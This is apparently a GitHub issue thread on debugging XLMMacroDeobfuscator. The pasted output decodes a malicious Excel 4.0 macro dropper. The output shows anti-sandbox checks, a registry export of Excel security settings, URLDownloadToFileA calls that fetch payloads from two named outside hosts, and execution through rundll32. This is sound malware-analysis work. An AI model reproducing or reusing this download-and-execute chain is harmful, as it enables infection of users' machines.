Closed Maijin closed 4 years ago
DissectMalware
commented
4 years ago It seems the installed python package is not the latest version. Please update: pip install -U https://github.com/DissectMalware/XLMMacroDeobfuscator/archive/master.zip
https://app.any.run/tasks/db6c055f-9308-461b-b69b-af067e5c30b3/
Maijin
commented
4 years ago I'm using git version already
DissectMalware
commented
4 years ago It seems the code is not updated, can you try once agqin. Use that -U switch please. On my side, I can see the macros (it is not fully deobfuscated though)
Maijin
commented
4 years ago I did execute your command too just in case
doomedraven
commented
4 years ago hm i have latest version https://www.capesandbox.com/analysis/4231/
CELL:GV39936 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!N44954,"350")
CELL:GV39937 , FullEvaluation ,GOTO(DZ42628)
CELL:DZ42628 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BP33912,"-324")
CELL:DZ42629 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ10688)
CELL:IJ10688 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR12026,"354")
CELL:IJ10689 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FC53205)
CELL:FC53205 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EO10249,"-119.375")
CELL:FC53206 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EX42970)
CELL:EX42970 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HQ1545,"-1610.75")
CELL:EX42971 , FullEvaluation ,GOTO(BS22011)
CELL:BS22011 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BE35884,"-58.5")
CELL:BS22012 , FullEvaluation ,GOTO(GV15593)
CELL:GV15593 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EQ4206,"-117")
CELL:GV15594 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GU27740)
CELL:GU27740 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FR9280,"16")
CELL:GU27741 , FullEvaluation ,GOTO(EI18804)
CELL:EI18804 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EM607,"-352")
CELL:EI18805 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HP45619)
CELL:HP45619 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BX12067,"-660")
CELL:HP45620 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FZ15723)
CELL:FZ15723 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GC38174,"229")
CELL:FZ15724 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DG36945)
CELL:DG36945 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DH56289,"-880")
CELL:DG36946 , FullEvaluation ,GOTO(DE32138)
CELL:DE32138 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BC714,"-121")
CELL:DE32139 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR8980)
CELL:AR8980 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HC64915,"-70")
CELL:AR8981 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BP50696)
CELL:BP50696 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DX52324,"-277")
CELL:BP50697 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BR26103)
CELL:BR26103 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DR4363,"-324")
CELL:BR26104 , FullEvaluation ,GOTO(BH29629)
CELL:BH29629 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GO46148,"498")
CELL:BH29630 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DS20724)
CELL:DS20724 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HV52886,"-138")
CELL:DS20725 , FullEvaluation ,GOTO(BJ25046)
CELL:BJ25046 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FC11381,"-409")
CELL:BJ25047 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HU5854)
CELL:HU5854 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG51684,"-159")
CELL:HU5855 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG63410)
CELL:IG63410 , FullEvaluation ,FORMULA.FILL("=""Te workb7YV cûnĖotCHAR(FR9280-GX55573)be0o8ened or rscaied Ċy MWrÄsoft EĒcel bÿcause t CHAR(BX12067+IH58864)ČruptÈ""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ30870)
CELL:IG63411 , FullEvaluation ,GOTO(GU23233)
CELL:GU23233 , FullEvaluation ,FORMULA.FILL("M""C:\ÿwnÄ?ssyětem32\rull32.¢e""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG36768)
CELL:GU23234 , FullEvaluation ,GOTO(ER48982)
CELL:ER48982 , FullEvaluation ,FORMULA.FILL("=""httÆs:CHAR(BX12067+HX8892)Édoqs.microsofĜ.com/en-uCHAR(BX12067-IT32592)oiceĊdates/}ffi}e-mCHAR(BX12067-GQ6921)i-CHAR(BX12067-AX57549)oĖ-se}uriĜy-ďpdat-sL",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DS27743)
CELL:ER48983 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BW2025)
CELL:BW2025 , FullEvaluation ,FORMULA.FILL("1APPÈAXCHAR(BX12067+GT31749)MIOE()",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GQ9902)
CELL:BW2026 , FullEvaluation ,GOTO(FY9435)
CELL:FY9435 , FullEvaluation ,FORMULA.FILL("=pRGCHAR(BX12067-GX12638)T.WORKSPRCEÐ13)<E70,CLO}E(FAvIE4,)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FU28066)
CELL:FY9436 , FullEvaluation ,GOTO(S39706)
CELL:S39706 , FullEvaluation ,FORMULA.FILL("åI=(GETQWORKBPAeo(14S<39Z,CLOS=(FAôSE):)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EP16580)
CELL:S39707 , FullEvaluation ,GOTO(FP47804)
CELL:FP47804 , FullEvaluation ,FORMULA.FILL("=F(GEb.?{KSP4CECHAR(FR9280+BK1657)[97CHAR(BX12067+ER13725),QLOSE(TRUS))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HE9813)
CELL:FP47805 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!G36679)
CELL:G36679 , FullEvaluation ,FORMULA.FILL("=IF(ïzT.yìKSPACE<42)CHAR(BX12067-J64035),CL÷E(TúUE))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ45391)
CELL:G36680 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!C33283)
CELL:C33283 , FullEvaluation ,FORMULA.FILL("=I=(ISNUMcER(SEARCH(ÊWiĖdo
\3,GíT.eORKSP6
1)Ã),,CLOSE(~RýßCHAR(FR9280-II20509)!",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IF15617)
CELL:C33284 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!I52087)
CELL:I52087 , FullEvaluation ,FORMULA.FILL("=""EXCHAR(BX12067-FV8453)CHAR(BX12067+EX49285)úîCHAR(BX12067-C26854)CHAR(BX12067+DV54715)KmU\SoĎwaretçTcrosoft\Oftice\""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR32666)
CELL:I52088 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BX45347)
CELL:BX45347 , FullEvaluation ,FORMULA.FILL("=""C:¢UerstPuVc\Q7vo.re/""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HB46563)
CELL:BX45348 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IE28733)
CELL:IE28733 , FullEvaluation ,FORMULA.FILL("=[-1CHAR(BX12067+HI10227)653]C[W140]&GE~CHAR(FR9280+IQ53023)WRKSPA
E(ÌS&""$hxcel\Scu:i¯y 0ÎHI-\756]C[26]Î""º;yCHAR(FR9280-FJ51504)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GB51319)
CELL:IE28734 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!CO12689)
CELL:CO12689 , FullEvaluation ,FORMULA.FILL("=ÊC:\WidĉwËJsēstem3
\reu.čxe",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FI4775)
CELL:CO12690 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AM23759)
CELL:AM23759 , Error ,FORMULA.FILL("CHAR(BX12067-FB62566)CALL(""ShYll32""&""ShQllEÔeċ=teA"",""JJCCCJJ""#H:""opYn
,ì[C43793]v[90¤&úăÚ75']C[109k,0,54",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BW48568)
also just did sudo pip3 install git+https://github.com/DissectMalware/XLMMacroDeobfuscator.git -U
terminal
[Loading Cells]
auto_open: auto_open->MbN1jTM9PE9m097eYMH4qeGgJX3JZb!$GV$39936
[Starting Deobfuscation]
Error: No terminal defined for 'Ê' at line 1 col 2
=ÊC:\WidĉwËJsēstem3
\reu.čxe
^
Expecting: {'QUOTE', '__ANON_1', 'BOOLEAN', 'NAME', 'NUMBER', 'STRING', 'L_PRA'}
Previous tokens: Token(EQUAL, '=')
time elapsed: 3.527353048324585
the output us the same
Maijin
commented
4 years ago On mac without excel doesn't work (that's what I pasted) On a Windows VM with Excel I have same output as @doomedraven maybe that's where the problem comes from?
I actually even deleted all the xlmdeofuscator files on the mac before reinstalling
DissectMalware
commented
4 years ago Excel is not needed any more. You don't even need to install pywin32 which is required to work with Excel COM obj. The app will check the presence of Excel if you don't specify --no-ms-excel switch. But, it will not fail to proceed if you don't have it or didn't installed pywin32. Not sure why you have a problem with installing it on a Mac!
Can you do this:
pip show XLMMacroDeobfuscator
the current version is 0.1.3
spencerwp
commented
4 years ago This seems to work ok with xlrd2 and "-d 5" param. Many of the evaluations include DAY(NOW()).
Maijin
commented
4 years ago 
doomedraven
commented
4 years ago @spencerwp how do you figurate the day param? bruteforce? with -d works fine
╰─○ xlmdeobfuscator -2 -n -f Qi_7295.xls -d 5
Excel is not present
[Loading Cells]
auto_open: auto_open->MbN1jTM9PE9m097eYMH4qeGgJX3JZb!$GV$39936
[Starting Deobfuscation]
CELL:GV39936 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!N44954,"350")
CELL:GV39937 , FullEvaluation ,GOTO(DZ42628)
CELL:DZ42628 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BP33912,"-324")
CELL:DZ42629 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ10688)
CELL:IJ10688 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR12026,"200")
CELL:IJ10689 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FC53205)
CELL:FC53205 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EO10249,"-119.375")
CELL:FC53206 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EX42970)
CELL:EX42970 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HQ1545,"-1610.75")
CELL:EX42971 , FullEvaluation ,GOTO(BS22011)
CELL:BS22011 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BE35884,"-72.5")
CELL:BS22012 , FullEvaluation ,GOTO(GV15593)
CELL:GV15593 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EQ4206,"-117")
CELL:GV15594 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GU27740)
CELL:GU27740 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FR9280,"72")
CELL:GU27741 , FullEvaluation ,GOTO(EI18804)
CELL:EI18804 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EM607,"-352")
CELL:EI18805 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HP45619)
CELL:HP45619 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BX12067,"-520")
CELL:HP45620 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FZ15723)
CELL:FZ15723 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GC38174,"229")
CELL:FZ15724 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DG36945)
CELL:DG36945 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DH56289,"-880")
CELL:DG36946 , FullEvaluation ,GOTO(DE32138)
CELL:DE32138 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BC714,"-121")
CELL:DE32139 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR8980)
CELL:AR8980 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HC64915,"-70")
CELL:AR8981 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BP50696)
CELL:BP50696 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DX52324,"-277")
CELL:BP50697 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BR26103)
CELL:BR26103 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DR4363,"-366")
CELL:BR26104 , FullEvaluation ,GOTO(BH29629)
CELL:BH29629 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GO46148,"330")
CELL:BH29630 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DS20724)
CELL:DS20724 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HV52886,"-138")
CELL:DS20725 , FullEvaluation ,GOTO(BJ25046)
CELL:BJ25046 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FC11381,"-409")
CELL:BJ25047 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HU5854)
CELL:HU5854 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG51684,"-159")
CELL:HU5855 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG63410)
CELL:IG63410 , FullEvaluation ,FORMULA.FILL("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ30870)
CELL:IG63411 , FullEvaluation ,GOTO(GU23233)
CELL:GU23233 , FullEvaluation ,FORMULA.FILL("=""C:\Windows\system32\rundll32.exe""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG36768)
CELL:GU23234 , FullEvaluation ,GOTO(ER48982)
CELL:ER48982 , FullEvaluation ,FORMULA.FILL("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DS27743)
CELL:ER48983 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BW2025)
CELL:BW2025 , FullEvaluation ,FORMULA.FILL("=APP.MAXIMIZE()",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GQ9902)
CELL:BW2026 , FullEvaluation ,GOTO(FY9435)
CELL:FY9435 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FU28066)
CELL:FY9436 , FullEvaluation ,GOTO(S39706)
CELL:S39706 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EP16580)
CELL:S39707 , FullEvaluation ,GOTO(FP47804)
CELL:FP47804 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HE9813)
CELL:FP47805 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!G36679)
CELL:G36679 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ45391)
CELL:G36680 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!C33283)
CELL:C33283 , FullEvaluation ,FORMULA.FILL("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,CLOSE(TRUE))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IF15617)
CELL:C33284 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!I52087)
CELL:I52087 , FullEvaluation ,FORMULA.FILL("=""EXPORT HKCU\Software\Microsoft\Office\""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR32666)
CELL:I52088 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BX45347)
CELL:BX45347 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\Qv7vo.reg""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HB46563)
CELL:BX45348 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IE28733)
CELL:IE28733 , FullEvaluation ,FORMULA.FILL("=R[-18653]C[-140]&GET.WORKSPACE(2)&""\Excel\Security ""&R[-4756]C[26]&"" /y""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GB51319)
CELL:IE28734 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!CO12689)
CELL:CO12689 , FullEvaluation ,FORMULA.FILL("=""C:\Windows\system32\reg.exe""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FI4775)
CELL:CO12690 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AM23759)
CELL:AM23759 , FullEvaluation ,FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-43793]C[90],R[2751]C[109],0,5)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BW48568)
CELL:AM23760 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HE63797)
CELL:HE63797 , FullEvaluation ,FORMULA.FILL("=WHILE(ISERROR(FILES(R[20579]C[139])))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BS25984)
CELL:HE63798 , FullEvaluation ,GOTO(BF57512)
CELL:BF57512 , FullEvaluation ,FORMULA.FILL("=WAIT(NOW()+""00:00:01"")",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BS25985)
CELL:BF57513 , FullEvaluation ,GOTO(FM33746)
CELL:FM33746 , FullEvaluation ,FORMULA.FILL("=NEXT()",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BS25986)
CELL:FM33747 , FullEvaluation ,GOTO(A2901)
CELL:A2901 , FullEvaluation ,FORMULA.FILL("=""http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!CN21650)
CELL:A2902 , FullEvaluation ,GOTO(GD3222)
CELL:GD3222 , FullEvaluation ,FORMULA.FILL("=""http://ekhobrand.com/wp-smart.php""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BH56678)
CELL:GD3223 , FullEvaluation ,GOTO(DY49440)
CELL:DY49440 , FullEvaluation ,FORMULA.FILL("=FOPEN(R[42258]C[95])",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DK4305)
CELL:DY49441 , FullEvaluation ,GOTO(GK10063)
CELL:GK10063 , FullEvaluation ,FORMULA.FILL("=FPOS(R[-12266]C[37],215)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BZ16571)
CELL:GK10064 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AV64812)
CELL:AV64812 , FullEvaluation ,FORMULA.FILL("=FREAD(R[-13463]C[-98],255)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HE17768)
CELL:AV64813 , FullEvaluation ,GOTO(GP9384)
CELL:GP9384 , FullEvaluation ,FORMULA.FILL("=FCLOSE(R[-12895]C[9])",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DB17200)
CELL:GP9385 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EB42504)
CELL:EB42504 , FullEvaluation ,FORMULA.FILL("=FILE.DELETE(R[-8553]C[151])",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BG55116)
CELL:EB42505 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FV8481)
CELL:FV8481 , FullEvaluation ,FORMULA.FILL("=IF(ISNUMBER(SEARCH(""0001"",R[-20517]C[85])),CLOSE(FALSE),)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DX38285)
CELL:FV8482 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DQ226)
CELL:DQ226 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\DBoDYRP.html""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GQ29178)
CELL:DQ227 , FullEvaluation ,GOTO(FF49395)
CELL:FF49395 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[20593]C[120],R[22028]C[196],0,0)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!C7150)
CELL:FF49396 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HB15991)
CELL:HB15991 , FullEvaluation ,FORMULA.FILL("=FILES(R[-9196]C[50])",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!ES38374)
CELL:HB15992 , FullEvaluation ,GOTO(CI7086)
CELL:CI7086 , FullEvaluation ,FORMULA.FILL("=IF(ISERROR(R[16199]C[83]),CLOSE(FALSE),)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BN22175)
CELL:CI7087 , FullEvaluation ,GOTO(DQ55298)
CELL:DQ55298 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\3HylL.html""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EK37835)
CELL:DQ55299 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IA38483)
CELL:IA38483 , FullEvaluation ,FORMULA.FILL("=R[-27576]C[138]&"",DllRegisterServer""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!C65411)
CELL:IA38484 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EP58082)
CELL:EP58082 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-19267]C[-22],R[-3082]C[27],0,0)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DJ40917)
CELL:EP58083 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR7983)
CELL:AR7983 , FullEvaluation ,FORMULA.FILL("=FILES(R[-18450]C[-62])",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GU56285)
CELL:AR7984 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IH27829)
CELL:IH27829 , FullEvaluation ,FORMULA.FILL("=IF(ISERROR(R[25823]C[151]),,RUN(R[-28301]C[128]))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AZ30462)
CELL:IH27830 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!CC60603)
CELL:CC60603 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[35570]C[-77],R[16727]C[4],0,0)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EG21108)
CELL:CC60604 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DX65350)
CELL:DX65350 , FullEvaluation ,FORMULA.FILL("=ALERT(R[28709]C[64],2)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FX2161)
CELL:DX65351 , FullEvaluation ,GOTO(BG11408)
CELL:BG11408 , FullEvaluation ,FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[13375]C[58],R[42018]C[-180],0,5)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GA23393)
CELL:BG11409 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GF33363)
CELL:GF33363 , FullEvaluation ,FORMULA.FILL("=CLOSE(FALSE)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BC22382)
CELL:GF33364 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ30870)
CELL:IJ30870 , FullEvaluation ,"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
CELL:IJ30871 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG36768)
CELL:IG36768 , FullEvaluation ,"C:\Windows\system32\rundll32.exe"
CELL:IG36769 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DS27743)
CELL:DS27743 , FullEvaluation ,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
CELL:DS27744 , FullEvaluation ,GOTO(GQ9902)
CELL:GQ9902 , NotImplemented ,APP.MAXIMIZE()
CELL:GQ9903 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FU28066)
CELL:FU28066 , FullBranching ,IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
CELL:FU28066 , End ,[TRUE] CLOSE(FALSE)
CELL:FU28066 , FullEvaluation ,[FALSE]
CELL:FU28067 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EP16580)
CELL:EP16580 , FullBranching , IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
CELL:EP16580 , End , [TRUE] CLOSE(FALSE)
CELL:EP16580 , FullEvaluation , [FALSE]
CELL:EP16581 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HE9813)
CELL:HE9813 , FullEvaluation , IF(GET.WORKSPACE(19),,CLOSE(TRUE))
CELL:HE9814 , FullEvaluation , GOTO(IJ45391)
CELL:IJ45391 , FullEvaluation , IF(GET.WORKSPACE(42),,CLOSE(TRUE))
CELL:IJ45392 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IF15617)
CELL:IF15617 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
CELL:IF15618 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR32666)
CELL:AR32666 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\"
CELL:AR32667 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HB46563)
CELL:HB46563 , FullEvaluation , "C:\Users\Public\Qv7vo.reg"
CELL:HB46564 , FullEvaluation , GOTO(GB51319)
CELL:GB51319 , FullEvaluation , EXPORT HKCU\Software\Microsoft\Office\"GET.WORKSPACE(2)\Excel\Security "C:\Users\Public\Qv7vo.reg /y
CELL:GB51320 , FullEvaluation , GOTO(FI4775)
CELL:FI4775 , FullEvaluation , "C:\Windows\system32\reg.exe"
CELL:FI4776 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BW48568)
CELL:BW48568 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\reg.exe""","EXPORT HKCU\Software\Microsoft\Office\""GET.WORKSPACE(2)\Excel\Security ""C:\Users\Public\Qv7vo.reg /y",0,5)
CELL:BW48569 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BS25984)
